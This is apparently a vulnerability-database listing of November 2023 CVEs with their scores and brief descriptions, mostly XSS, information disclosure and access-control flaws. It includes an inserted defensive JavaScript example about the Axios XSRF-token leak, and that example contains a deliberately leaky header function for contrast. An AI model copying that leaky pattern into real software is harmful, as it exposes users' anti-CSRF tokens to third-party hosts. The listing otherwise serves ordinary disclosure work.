Cross Site Request Forgery (CSRF) vulnerability in NASA Open MCT (aka openmct) through 3.1.0 allows attackers to view sensitive information via the flexibleLayout plugin.

6.5
2023-11-09 CVE-2023-47368 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in taketorinoyu Line 13.6.1 allows remote attackers to send malicious notifications to victims.

6.5
2023-11-09 CVE-2023-47370 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in bluetrick Line 13.6.1 allows remote attackers to send malicious notifications to victims.

6.5
2023-11-09 CVE-2023-47372 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in UPDATESALON C-LOUNGE Line 13.6.1 allows remote attackers to send malicious notifications to victims.

6.5
2023-11-09 CVE-2023-47373 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in DRAGON FAMILY Line 13.6.1 allows remote attackers to send malicious notifications to victims.

6.5
2023-11-09 CVE-2023-47363 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in F.B.P members Line 13.6.1 allows remote attackers to send malicious notifications to victims.

6.5
2023-11-09 CVE-2023-47364 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in nagaoka taxi Line 13.6.1 allows remote attackers to send malicious notifications to victims.

6.5
2023-11-09 CVE-2023-47365 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in Lil.OFF-PRICE STORE Line 13.6.1 allows remote attackers to send malicious notifications to victims.

6.5
2023-11-09 CVE-2023-47366 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in craft_members Line 13.6.1 allows remote attackers to send malicious notifications to victims.

6.5
2023-11-09 CVE-2023-47367 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in platinum clinic Line 13.6.1 allows remote attackers to send malicious notifications to victims.

6.5
2023-11-09 CVE-2023-47369 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in best_training_member Line 13.6.1 allows remote attackers to send malicious notifications.

6.5
2023-11-09 CVE-2023-20902 Linuxfoundation Race Condition vulnerability in Linuxfoundation Harbor

A timing condition in Harbor 2.6.x and below, Harbor 2.7.2 and below, Harbor 2.8.2 and below, and Harbor 1.10.17 and below allows an attacker with network access to create jobs/stop job tasks and retrieve job task information.

6.5
2023-11-08 CVE-2023-45857 Axios Cross-Site Request Forgery (CSRF) vulnerability in Axios 1.5.1

An issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.

6.5
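The Axios entry above is an origin-check regression: an anti-CSRF token is only meaningful to the site that issued it, so copying it into a header on a request bound for any other host turns a defence into a credential leak. The block below is an added example, not Axios project code: it shows the same-origin gate a browser client should apply before attaching the XSRF header, alongside the leaky behaviour for contrast, and an audit helper that lists which of an application's request targets would receive the token under the leaky behaviour. The page origin, cookie jar, request list and every function name are assumptions of this example.

```javascript
// Added example (not Axios code): gate the XSRF header on request origin.

// Constructed sample: the origin the single-page app was served from, and the
// cookies a browser would hold for it.
const PAGE_ORIGIN = 'https://app.example.test';
const cookieJar = { 'XSRF-TOKEN': 'constructed-xsrf-token-123', session: 'sid-abc' };

// Resolve requestUrl (absolute, protocol-relative or path-relative) against
// the page origin and compare scheme, host and port. Anything that fails to
// parse is treated as foreign so no secret is attached by accident.
function isSameOrigin(requestUrl, pageOrigin = PAGE_ORIGIN) {
  let target;
  try {
    target = new URL(requestUrl, pageOrigin);
  } catch {
    return false;
  }
  return target.origin === new URL(pageOrigin).origin;
}

// Hardened behaviour: the token is attached only when the request goes back
// to the page's own origin, the only place the server can verify it.
function buildHeaders(requestUrl, opts = {}) {
  const {
    jar = cookieJar,
    pageOrigin = PAGE_ORIGIN,
    xsrfCookieName = 'XSRF-TOKEN',
    xsrfHeaderName = 'X-XSRF-TOKEN',
  } = opts;
  const headers = {};
  const token = jar[xsrfCookieName];
  if (token && isSameOrigin(requestUrl, pageOrigin)) {
    headers[xsrfHeaderName] = token;
  }
  return headers;
}

// Leaky behaviour for contrast, matching what the entry describes: the header
// is attached to every request regardless of destination host.
function buildHeadersLeaky(requestUrl, opts = {}) {
  const { jar = cookieJar, xsrfCookieName = 'XSRF-TOKEN', xsrfHeaderName = 'X-XSRF-TOKEN' } = opts;
  const headers = {};
  const token = jar[xsrfCookieName];
  if (token) headers[xsrfHeaderName] = token;
  return headers;
}

// Audit helper: given the URLs an application calls, return the ones that
// would have received the token under the leaky behaviour.
function findCrossOriginLeaks(requestUrls, pageOrigin = PAGE_ORIGIN) {
  return requestUrls.filter((u) => !isSameOrigin(u, pageOrigin));
}

// Constructed request list: two first-party calls, two third-party calls.
const SAMPLE_REQUESTS = [
  '/api/v1/profile',
  'https://app.example.test:443/api/v1/orders',
  'https://cdn.example.net/assets/app.js',
  'https://telemetry.third-party.example/collect',
];

for (const u of SAMPLE_REQUESTS) {
  console.log(u, 'hardened:', buildHeaders(u), 'leaky:', buildHeadersLeaky(u));
}
console.log('would leak to:', findCrossOriginLeaks(SAMPLE_REQUESTS));
```

Two details are easy to get wrong when writing this check by hand: a protocol-relative URL such as `//other.example/x` resolves to a different origin even though it starts with a slash, and an explicit default port (`:443` on https) normalises to the same origin. Comparing `URL.origin` values handles both.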
2023-11-08 CVE-2023-4061 Redhat Unspecified vulnerability in Redhat products

A flaw was found in wildfly-core.

6.5
2023-11-07 CVE-2023-4154 Samba Out-of-bounds Write vulnerability in Samba

A design flaw was found in Samba's DirSync control implementation, which exposes passwords and secrets in Active Directory to privileged users and Read-Only Domain Controllers (RODCs).

6.5
2023-11-07 CVE-2023-5709 WEB Dorado SQL Injection vulnerability in Web-Dorado WD Widgettwitter

The WD WidgetTwitter plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 1.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.

6.5
2023-11-07 CVE-2023-42546 Samsung Exposure of Resource to Wrong Sphere vulnerability in Samsung Account

Use of implicit intent for sensitive communication vulnerability in startAgreeToDisclaimerActivity in Samsung Account prior to version 14.5.00.7 allows attackers to access arbitrary file with Samsung Account privilege.

6.5
2023-11-07 CVE-2023-42547 Samsung Exposure of Resource to Wrong Sphere vulnerability in Samsung Account

Use of implicit intent for sensitive communication vulnerability in startEmailValidationActivity in Samsung Account prior to version 14.5.00.7 allows attackers to access arbitrary file with Samsung Account privilege.

6.5
2023-11-07 CVE-2023-42548 Samsung Unspecified vulnerability in Samsung Account

Use of implicit intent for sensitive communication vulnerability in startMandatoryCheckActivity in Samsung Account prior to version 14.5.00.7 allows attackers to access arbitrary file with Samsung Account privilege.

6.5
2023-11-07 CVE-2023-42549 Samsung Exposure of Resource to Wrong Sphere vulnerability in Samsung Account

Use of implicit intent for sensitive communication vulnerability in startNameValidationActivity in Samsung Account prior to version 14.5.00.7 allows attackers to access arbitrary file with Samsung Account privilege.

6.5
2023-11-07 CVE-2023-42550 Samsung Unspecified vulnerability in Samsung Account

Use of implicit intent for sensitive communication vulnerability in startSignIn in Samsung Account prior to version 14.5.00.7 allows attackers to access arbitrary file with Samsung Account privilege.

6.5
2023-11-07 CVE-2023-42551 Samsung Exposure of Resource to Wrong Sphere vulnerability in Samsung Account

Use of implicit intent for sensitive communication vulnerability in startTncActivity in Samsung Account prior to version 14.5.00.7 allows attackers to access arbitrary file with Samsung Account privilege.

6.5
2023-11-07 CVE-2023-40453 Docker Unspecified vulnerability in Docker Machine

Docker Machine through 0.16.2 allows an attacker, who has control of a worker node, to provide crafted version data, which might potentially trick an administrator into performing an unsafe action (via escape sequence injection), or might have a data size that causes a denial of service to a bastion node.

6.5
2023-11-07 CVE-2023-36409 Microsoft Unspecified vulnerability in Microsoft Edge Chromium

Microsoft Edge (Chromium-based) Information Disclosure Vulnerability

6.5
2023-11-06 CVE-2023-4930 Shamimsplugins Files or Directories Accessible to External Parties vulnerability in Shamimsplugins Front END PM

The Front End PM WordPress plugin before 11.4.3 does not block listing the contents of the directories where it stores attachments to private messages, allowing unauthenticated visitors to list and download private attachments if the autoindex feature of the web server is enabled.

6.5
2023-11-06 CVE-2023-4700 Gitlab Unspecified vulnerability in Gitlab

An authorization issue affecting GitLab EE affecting all versions from 14.7 prior to 16.3.6, 16.4 prior to 16.4.2, and 16.5 prior to 16.5.1, allowed a user to run jobs in protected environments, bypassing any required approvals.

6.5
2023-11-06 CVE-2023-3909 Gitlab Resource Exhaustion vulnerability in Gitlab

An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.3 before 16.3.6, all versions starting from 16.4 before 16.4.2, all versions starting from 16.5 before 16.5.1.

6.5
2023-11-06 CVE-2023-5825 Gitlab Resource Exhaustion vulnerability in Gitlab

An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.2 before 16.3.6, all versions starting from 16.4 before 16.4.2, all versions starting from 16.5 before 16.5.1.

6.5
2023-11-06 CVE-2023-28794 Zscaler Origin Validation Error vulnerability in Zscaler Client Connector 1.3/1.3.0.31/1.3.1

Origin Validation Error vulnerability in Zscaler Client Connector on Linux allows Privilege Abuse.

6.5
2023-11-06 CVE-2023-42669 Samba
Redhat

A vulnerability was found in Samba's "rpcecho" development server, a non-Windows RPC server used to test Samba's DCE/RPC stack elements.

6.5
2023-11-06 CVE-2023-32840 Mediatek Out-of-bounds Write vulnerability in Mediatek products

In modem CCCI, there is a possible out of bounds write due to a missing bounds check.

6.5
2023-11-09 CVE-2023-39198 Linux
Fedoraproject
Redhat
Use After Free vulnerability in multiple products

A race condition was found in the QXL driver in the Linux kernel.

6.4
2023-11-06 CVE-2023-40661 Opensc Project
Redhat
Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in multiple products

Several memory vulnerabilities were identified within the OpenSC packages, particularly in the card enrollment process using pkcs15-init when a user or administrator enrolls cards.

6.4
2023-11-10 CVE-2023-36027 Microsoft Unspecified vulnerability in Microsoft Edge Chromium

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

6.3
2023-11-10 CVE-2023-6073 Volkswagen Unspecified vulnerability in Volkswagen Id.3 Firmware

Attacker can perform a Denial of Service attack to crash the ICAS 3 IVI ECU in a Volkswagen ID.3 (and other vehicles of the VW Group with the same hardware) and spoof volume setting commands to irreversibly turn on audio volume to maximum via REST API calls.

6.3
2023-11-10 CVE-2023-46734 Sensiolabs Cross-site Scripting vulnerability in Sensiolabs Symfony

Symfony is a PHP framework for web and console applications and a set of reusable PHP components.

6.1
2023-11-10 CVE-2023-46735 Sensiolabs Cross-site Scripting vulnerability in Sensiolabs Symfony

Symfony is a PHP framework for web and console applications and a set of reusable PHP components.

6.1
2023-11-10 CVE-2023-47119 Discourse Cross-site Scripting vulnerability in Discourse

Discourse is an open source platform for community discussion.

6.1
2023-11-10 CVE-2023-6075 Phpgurukul Cross-site Scripting vulnerability in PHPgurukul Restaurant Table Booking System 1.0

A vulnerability classified as problematic has been found in PHPGurukul Restaurant Table Booking System 1.0.

6.1
2023-11-10 CVE-2023-47164 Digitaldruid Cross-site Scripting vulnerability in Digitaldruid Hoteldruid

Cross-site scripting vulnerability in HOTELDRUID 3.0.5 and earlier allows a remote unauthenticated attacker to execute an arbitrary script on the web browser of the user who is logging in to the product.

6.1
2023-11-10 CVE-2023-46729 Sentry Server-Side Request Forgery (SSRF) vulnerability in Sentry Software Development KIT

sentry-javascript provides Sentry SDKs for JavaScript.

6.1
2023-11-09 CVE-2023-5541 Moodle Cross-site Scripting vulnerability in Moodle

The CSV grade import method contained an XSS risk for users importing the spreadsheet, if it contained unsafe content.

6.1
2023-11-09 CVE-2023-5547 Moodle
Redhat
Fedoraproject
Cross-site Scripting vulnerability in multiple products

The course upload preview contained an XSS risk for users uploading unsafe data.

6.1
2023-11-09 CVE-2023-47612 Telit Files or Directories Accessible to External Parties vulnerability in Telit products

A CWE-552: Files or Directories Accessible to External Parties vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow an attacker with physical access to the target system to obtain read/write access to any files and directories on the targeted system, including hidden files and directories.

6.1
2023-11-09 CVE-2023-47488 Combodo Cross-site Scripting vulnerability in Combodo Itop 3.1.0211973

Cross Site Scripting vulnerability in Combodo iTop v.3.1.0-2-11973 allows a local attacker to obtain sensitive information via a crafted script to the attrib_manager_id parameter in the General Information page and the id parameter in the contact page.

6.1
2023-11-09 CVE-2023-46492 Mldb Cross-site Scripting vulnerability in Mldb Machine Learning Database 2017.04.17.0

Cross Site Scripting vulnerability in MLDB.ai v.2017.04.17.0 allows a remote attacker to execute arbitrary code via a crafted payload to the public_html/doc/index.html.

6.1
2023-11-09 CVE-2023-37533 Hcltech Cross-site Scripting vulnerability in Hcltech Connections 8.0

HCL Connections is vulnerable to reflected cross-site scripting (XSS) where an attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user after visiting the vulnerable URL which contains the malicious script code.

6.1
2023-11-08 CVE-2023-47114 Ethyca Cross-site Scripting vulnerability in Ethyca Fides

Fides is an open-source privacy engineering platform for managing the fulfillment of data privacy requests in your runtime environment, and the enforcement of privacy regulations in your code.

6.1
2023-11-08 CVE-2023-46643 Cloudnet360 Cross-site Scripting vulnerability in Cloudnet360

Unauth.

6.1
2023-11-08 CVE-2023-32298 Helgatheviking Cross-site Scripting vulnerability in Helgatheviking Simple User Listing

Unauth.

6.1
2023-11-08 CVE-2023-46621 Enejbajgoric Gagansandhu Ctltdev Cross-site Scripting vulnerability in Enejbajgoric/Gagansandhu/Ctltdev User Avatar

Unauth.

6.1
2023-11-08 CVE-2023-46626 Flowfact Cross-site Scripting vulnerability in Flowfact

Unauth.

6.1
2023-11-08 CVE-2023-46627 Freelancer Coder Cross-site Scripting vulnerability in Freelancer-Coder Wordpress Simple Html Sitemap 1.0/2.0/2.1

Unauth.

6.1
2023-11-08 CVE-2023-6002 Yugabyte Cross-site Scripting vulnerability in Yugabyte Yugabytedb

YugabyteDB is vulnerable to cross site scripting (XSS) via log injection. Writing unvalidated user input to log files can allow an unprivileged attacker to forge log entries or inject malicious content into the logs.

6.1
2023-11-07 CVE-2023-46252 Squidex IO Cross-site Scripting vulnerability in Squidex.Io Squidex 7.8.2

Squidex is an open source headless CMS and content management hub.

6.1
2023-11-07 CVE-2023-32966 Crudlab Cross-Site Request Forgery (CSRF) vulnerability in Crudlab Jazz Popups

Cross-Site Request Forgery (CSRF) vulnerability in CRUDLab Jazz Popups leads to Stored XSS. This issue affects Jazz Popups: from n/a through 1.8.7.

6.1
2023-11-07 CVE-2023-41425 Wondercms Cross-site Scripting vulnerability in Wondercms

Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.

6.1
2023-11-07 CVE-2021-4431 Msyk Cross-site Scripting vulnerability in Msyk Fmdataapi

A vulnerability classified as problematic has been found in msyk FMDataAPI up to 22.

6.1
2023-11-07 CVE-2023-47510 Wpsolutions HQ Cross-site Scripting vulnerability in Wpsolutions-Hq Wpdbspringclean

Unauth.

6.1
2023-11-07 CVE-2019-25156 Dstar2018 Cross-site Scripting vulnerability in Dstar2018 Agency

A vulnerability classified as problematic was found in dstar2018 Agency up to 61.

6.1
2023-11-07 CVE-2023-46998 Bootboxjs Cross-site Scripting vulnerability in Bootboxjs Bootbox

Cross Site Scripting vulnerability in BootBox Bootbox.js v.3.2 through 6.0 allows a remote attacker to execute arbitrary code via a crafted payload to alert(), confirm(), prompt() functions.

6.1
2023-11-07 CVE-2019-25155 Cure53 Open Redirect vulnerability in Cure53 Dompurify

DOMPurify before 1.0.11 allows reverse tabnabbing in demos/hooks-target-blank-demo.html because links lack a 'rel="noopener noreferrer"' attribute.

6.1
2023-11-06 CVE-2023-5354 Getawesomesupport Cross-site Scripting vulnerability in Getawesomesupport Awesome Support

The Awesome Support WordPress plugin before 6.1.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

6.1
2023-11-06 CVE-2023-5771 Proofpoint Cross-site Scripting vulnerability in Proofpoint Enterprise Protection

Proofpoint Enterprise Protection contains a stored XSS vulnerability in the AdminUI.

6.1
2023-11-06 CVE-2022-48192 Softing Cross-site Scripting vulnerability in Softing Smartlink Sw-Ht

Cross-site Scripting vulnerability in Softing smartLink SW-HT before 1.30, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

6.1
2023-11-06 CVE-2023-46732 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

6.1
2023-11-06 CVE-2023-46251 Mybb Cross-site Scripting vulnerability in Mybb

MyBB is a free and open source forum software.

6.1
2023-11-06 CVE-2023-5950 Rapid7 Cross-site Scripting vulnerability in Rapid7 Velociraptor

Rapid7 Velociraptor versions prior to 0.7.0-4 suffer from a reflected cross site scripting vulnerability.

6.1
2023-11-06 CVE-2023-47185 Gvectors Cross-site Scripting vulnerability in Gvectors Wpdiscuz

Unauth.

6.1
2023-11-06 CVE-2023-46822 Visser Cross-site Scripting vulnerability in Visser Store Exporter for Woocommerce

Unauth.

6.1
2023-11-06 CVE-2023-47272 Roundcube
Fedoraproject
Debian
Cross-site Scripting vulnerability in multiple products

Roundcube 1.5.x before 1.5.6 and 1.6.x before 1.6.5 allows XSS via a Content-Type or Content-Disposition header (used for attachment preview or download).

6.1
2023-11-08 CVE-2022-48613 Huawei Race Condition vulnerability in Huawei Emui and Harmonyos

Race condition vulnerability in the kernel module.

5.9
2023-11-10 CVE-2023-45167 IBM Unspecified vulnerability in IBM AIX and Vios

IBM AIX's 7.3 Python implementation could allow a non-privileged local user to exploit a vulnerability to cause a denial of service.

5.5
2023-11-09 CVE-2023-6039 Linux Use After Free vulnerability in Linux Kernel

A use-after-free flaw was found in lan78xx_disconnect in drivers/net/usb/lan78xx.c in the network sub-component, net/usb/lan78xx in the Linux Kernel.

5.5
2023-11-09 CVE-2023-47615 Telit Unspecified vulnerability in Telit products

A CWE-526: Exposure of Sensitive Information Through Environmental Variables vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a local, low privileged attacker to get access to sensitive data on the targeted system.

5.5
2023-11-08 CVE-2023-4891 Lenovo Use After Free vulnerability in Lenovo View Driver

A potential use-after-free vulnerability was reported in the Lenovo View driver that could result in denial of service.

5.5
2023-11-08 CVE-2023-46362 Jbig2Enc Project Use After Free vulnerability in Jbig2Enc Project Jbig2Enc 0.28

jbig2enc v0.28 was discovered to contain a heap-use-after-free via jbig2enc_auto_threshold_using_hash in src/jbig2enc.cc.

5.5
2023-11-08 CVE-2023-46363 Jbig2Enc Project Unspecified vulnerability in Jbig2Enc Project Jbig2Enc 0.28

jbig2enc v0.28 was discovered to contain a SEGV via jbig2_add_page in src/jbig2enc.cc:512.

5.5
2023-11-08 CVE-2023-5136 NI Incorrect Permission Assignment for Critical Resource vulnerability in NI products

An incorrect permission assignment in the TopoGrafix DataPlugin for GPX could result in information disclosure.

5.5
2023-11-07 CVE-2023-46001 Gpac Classic Buffer Overflow vulnerability in Gpac 2.3Devrev573G201320819Master

Buffer Overflow vulnerability in gpac MP4Box v.2.3-DEV-rev573-g201320819-master allows a local attacker to cause a denial of service via the gpac/src/isomedia/isom_read.c:2807:51 function in gf_isom_get_user_data.

5.5
2023-11-07 CVE-2023-4272 ARM Unspecified vulnerability in ARM products

A local non-privileged user can make GPU processing operations that expose sensitive data from previously freed memory.

5.5
2023-11-07 CVE-2023-42527 Samsung Improper Input Validation vulnerability in Samsung Android 11.0/12.0

Improper input validation vulnerability in ProcessWriteFile of libsec-ril prior to SMR Nov-2023 Release 1 allows local attackers to expose sensitive information.

5.5
2023-11-07 CVE-2023-42534 Samsung Files or Directories Accessible to External Parties vulnerability in Samsung Android 12.0/13.0

Improper input validation vulnerability in ChooserActivity prior to SMR Nov-2023 Release 1 allows local attackers to read arbitrary files with system privilege.

5.5
2023-11-07 CVE-2023-42539 Samsung Unspecified vulnerability in Samsung Health

PendingIntent hijacking vulnerability in ChallengeNotificationManager in Samsung Health prior to version 6.25 allows local attackers to access data.

5.5
2023-11-07 CVE-2023-42540 Samsung Unspecified vulnerability in Samsung Account

Improper access control vulnerability in Samsung Account prior to version 14.5.01.1 allows attackers to access sensitive information via implicit intent.

5.5
2023-11-07 CVE-2023-42544 Samsung Unspecified vulnerability in Samsung Quick Share 13.1.2.4/3.5.14.18/3.5.16.20

Improper access control vulnerability in Quick Share prior to 13.5.52.0 allows a local attacker to access local files.

5.5
2023-11-07 CVE-2023-42555 Samsung Unspecified vulnerability in Samsung Easysetup

Use of implicit intent for sensitive communication vulnerability in EasySetup prior to version 11.1.13 allows attackers to get the bluetooth address of user device.

5.5
2023-11-07 CVE-2023-28553 Qualcomm Unspecified vulnerability in Qualcomm products

Information Disclosure in WLAN Host when processing WMI event command.

5.5
2023-11-07 CVE-2023-28554 Qualcomm Unspecified vulnerability in Qualcomm products

Information Disclosure in Qualcomm IPC while reading values from shared memory in VM.

5.5
2023-11-07 CVE-2023-28563 Qualcomm Unspecified vulnerability in Qualcomm products

Information disclosure in IOE Firmware while handling WMI command.

5.5
2023-11-07 CVE-2023-28566 Qualcomm Unspecified vulnerability in Qualcomm products

Information disclosure in WLAN HAL while handling the WMI state info command.

5.5
2023-11-07 CVE-2023-28568 Qualcomm Unspecified vulnerability in Qualcomm products

Information disclosure in WLAN HAL when reception status handler is called.

5.5
2023-11-07 CVE-2023-28569 Qualcomm Unspecified vulnerability in Qualcomm products

Information disclosure in WLAN HAL while handling command through WMI interfaces.

5.5
2023-11-07 CVE-2023-35140 Zyxel Improper Privilege Management vulnerability in Zyxel products

The improper privilege management vulnerability in the Zyxel GS1900-24EP switch firmware version V2.70(ABTO.5) could allow an authenticated local user with read-only access to modify system settings on a vulnerable device.

5.5
2023-11-07 CVE-2023-5748 Synology Classic Buffer Overflow vulnerability in Synology SSL VPN Client

Buffer copy without checking size of input ('Classic Buffer Overflow') vulnerability in cgi component in Synology SSL VPN Client before 1.4.7-0687 allows local users to conduct denial-of-service attacks via unspecified vectors.

5.5
2023-11-06 CVE-2023-4910 Redhat Exposure of Resource to Wrong Sphere vulnerability in Redhat 3Scale API Management 2.0

A flaw was found In 3Scale Admin Portal.

5.5
2023-11-06 CVE-2023-5090 Linux
Redhat
Improper Handling of Exceptional Conditions vulnerability in multiple products

A flaw was found in KVM.

5.5
2023-11-06 CVE-2023-32825 Google Out-of-bounds Read vulnerability in Google Android 13.0

In the bluetooth service, there is a possible out of bounds read due to improper input validation.

5.5
2023-11-06 CVE-2023-46802 NTA XXE vulnerability in NTA E-Tax 1.17.1

e-Tax software Version3.0.10 and earlier improperly restricts XML external entity references (XXE) due to the configuration of the embedded XML parser.

5.5
2023-11-11 CVE-2023-43057 IBM Cross-site Scripting vulnerability in IBM Qradar Security Information and Event Manager 7.5.0

IBM QRadar SIEM 7.5.0 is vulnerable to cross-site scripting.

5.4
2023-11-10 CVE-2023-45806 Discourse Unspecified vulnerability in Discourse

Discourse is an open source platform for community discussion.

5.4
2023-11-10 CVE-2023-46130 Discourse Allocation of Resources Without Limits or Throttling vulnerability in Discourse

Discourse is an open source platform for community discussion.

5.4
2023-11-09 CVE-2023-5544 Moodle
Redhat
Fedoraproject
Authorization Bypass Through User-Controlled Key vulnerability in multiple products

Wiki comments required additional sanitizing and access restrictions to prevent a stored XSS risk and potential IDOR risk.

5.4
2023-11-09 CVE-2023-5546 Moodle
Redhat
Fedoraproject
Cross-site Scripting vulnerability in multiple products

ID numbers displayed in the quiz grading report required additional sanitizing to prevent a stored XSS risk.

5.4
2023-11-09 CVE-2023-45885 Nasa Cross-site Scripting vulnerability in Nasa Openmct

Cross Site Scripting (XSS) vulnerability in NASA Open MCT (aka openmct) through 3.1.0 allows attackers to run arbitrary code via the new component feature in the flexibleLayout plugin.

5.4
2023-11-09 CVE-2023-37790 Broadcom Cross-site Scripting vulnerability in Broadcom Clarity 14.3.0.298

Jaspersoft Clarity PPM version 14.3.0.298 was discovered to contain an arbitrary file upload vulnerability via the Profile Picture Upload function.

5.4
2023-11-08 CVE-2023-47190 Apollo13Themes Cross-site Scripting vulnerability in Apollo13Themes Apollo13 Framework Extensions

Auth.

5.4
2023-11-08 CVE-2023-47229 Vyasdipen Cross-site Scripting vulnerability in Vyasdipen TOP 25 Social Icons

Auth.

5.4
2023-11-08 CVE-2023-47231 Bainternet Cross-site Scripting vulnerability in Bainternet Shortcodes UI

Auth.

5.4
2023-11-08 CVE-2023-47379 Microweber Cross-site Scripting vulnerability in Microweber 2.0.1

Microweber CMS version 2.0.1 is vulnerable to stored Cross Site Scripting (XSS) via the profile picture file upload functionality.

5.4
2023-11-08 CVE-2023-46613 ADD TO Calendar Button Cross-site Scripting vulnerability in Add-To-Calendar-Button ADD to Calendar Button

Auth.

5.4
2023-11-08 CVE-2023-46640 Mauvedev Cross-site Scripting vulnerability in Mauvedev Medialist

Auth.

5.4
2023-11-08 CVE-2023-46483 Timeteccloud Cross-site Scripting vulnerability in Timeteccloud Auto Web-Based Database Management System 2.0

Cross Site Scripting vulnerability in timetec AWDMS v.2.0 allows an attacker to obtain sensitive information via a crafted payload to the remark parameter of the New Zone function.

5.4
2023-11-07 CVE-2023-5982 Updraftplus Cross-Site Request Forgery (CSRF) vulnerability in Updraftplus

The UpdraftPlus: WordPress Backup & Migration Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.23.10.

5.4
2023-11-07 CVE-2023-28499 Simonpedge Cross-site Scripting vulnerability in Simonpedge Slide Anything-Responsive Content/Html Slider and Carousel

Auth.

5.4
2023-11-07 CVE-2023-46744 Squidex IO Cross-site Scripting vulnerability in Squidex.Io Squidex

Squidex is an open source headless CMS and content management hub.

5.4
2023-11-07 CVE-2023-4842 Warfareplugins Cross-site Scripting vulnerability in Warfareplugins Social Warfare

The Social Sharing Plugin - Social Warfare plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'social_warfare' shortcode in versions up to, and including, 4.4.3 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-4888 Illia Cross-site Scripting vulnerability in Illia Simple Like Page

The Simple Like Page Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'sfp-page-plugin' shortcode in versions up to, and including, 1.5.1 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5567 Spreendigital Cross-site Scripting vulnerability in Spreendigital QR Code TAG

The QR Code Tag plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'qrcodetag' shortcode in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5577 Bitly Cross-site Scripting vulnerability in Bitly

The Bitly's plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpbitly' shortcode in all versions up to, and including, 2.7.1 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5659 Tryinteract Cross-site Scripting vulnerability in Tryinteract Interact:Embed a Quiz on Your Site

The Interact: Embed A Quiz On Your Site plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'interact-quiz' shortcode in all versions up to, and including, 3.0.7 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5660 Pressified Cross-site Scripting vulnerability in Pressified Sendpress

The SendPress Newsletters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.22.3.31 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5661 WEB Settler Cross-site Scripting vulnerability in Web-Settler Social Feed

The Social Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'socialfeed' shortcode in all versions up to, and including, 1.5.4.6 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5669 Christiaanconover Cross-site Scripting vulnerability in Christiaanconover Featured Image Caption

The Featured Image Caption plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode and post meta in all versions up to, and including, 0.8.10 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5703 Giftup Cross-site Scripting vulnerability in Giftup Gift UP Gift Cards for Wordpress and Woocommerce

The Gift Up Gift Cards for WordPress and WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'giftup' shortcode in all versions up to, and including, 2.20.1 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5507 Imagemapper Project Cross-site Scripting vulnerability in Imagemapper Project Imagemapper 1.2.6

The ImageMapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'imagemap' shortcode in versions up to, and including, 1.2.6 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5658 Chandnipatel Cross-site Scripting vulnerability in Chandnipatel WP Mapit

The WP MapIt plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_mapit' shortcode in all versions up to, and including, 2.7.1 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5743 Gravitydesign Cross-site Scripting vulnerability in Gravitydesign Telephone Number Linker

